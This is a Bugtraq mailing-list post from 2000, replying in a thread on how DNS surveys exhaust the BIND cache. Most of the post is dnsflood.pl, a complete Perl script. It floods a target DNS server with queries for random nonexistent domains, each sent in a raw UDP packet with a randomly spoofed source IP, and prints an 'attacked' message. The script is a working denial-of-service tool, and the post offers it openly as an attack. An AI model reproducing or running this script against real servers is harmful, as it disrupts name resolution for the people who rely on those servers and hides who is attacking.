[17089] in bugtraq
Re: DNS PTR surveying
daemon@ATHENA.MIT.EDU (a007)
Sun Oct 8 14:42:40 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <15379612326.20001006151003@isd.memonet.ru>
Date: Fri, 6 Oct 2000 15:10:03 +0400
Reply-To: a007 <a007@isd.memonet.ru>
From: a007 <a007@ISD.MEMONET.RU>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <19970122150151.D473@antiz.marmoc.net>
Hello
>> A big, fast survey will kill a BIND cache, because BIND dies when it
>> runs out of memory. BIND 9 won't die, but it will stop caching new data,
> You should be able to kill bind and other dns cache software even
> faster using for example IN A query to name that does not exist for sure,
> better using RANDOM.some.domain.net with some.domain.net DNS slow or down.
I'm using somedomain.net and it worked fine.
DNSflood with ip source address spoofing.
------- dnsflood.pl -------
#!/usr/bin/perl
use Net::DNS::Resolver;
use Net::RawIP;
use strict;
if ($ARGV[0] eq '') {
print "Usage: dnsflood.pl <ip address>\n";
exit(0);
}
print ("attacked: $ARGV[0]...\n");
my @abc = ("a", "b", "c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v", "w", "x", "y",
"z");
my @domains = ("com", "org", "net"); # ...
my $str = @abc[int rand(25)];
my $name;
my $src_ip;
for (my $i=0; $i < 256; $i++) {
if ($i>60) { # Make new string
$str = @abc[int rand(9)];
$i = 0;
}
$str .= @abc[int rand(25)];
$name = $str . "." . @domains[int rand(3)];
$src_ip = int(rand(255)) . "." . int(rand(255)) . "." . int(rand(255)) . "." . int(rand(255));
# Make DNS packet
my $dnspacket = new Net::DNS::Packet($name, "A");
my $dnsdata = $dnspacket->data;
my $sock = new Net::RawIP({udp=>{}});
# send packet
$sock->set({ip => {
saddr => $src_ip, daddr => "$ARGV[0]", frag_off=>0,tos=>0,id=>1565},
udp => {source => 53,
dest => 53, data=>$dnsdata
} });
$sock->send;
}
exit(0);
------- EOT -------
By
--
Yevgeny V.Yourkhov
e-mail: a007@isd.memonet.ru
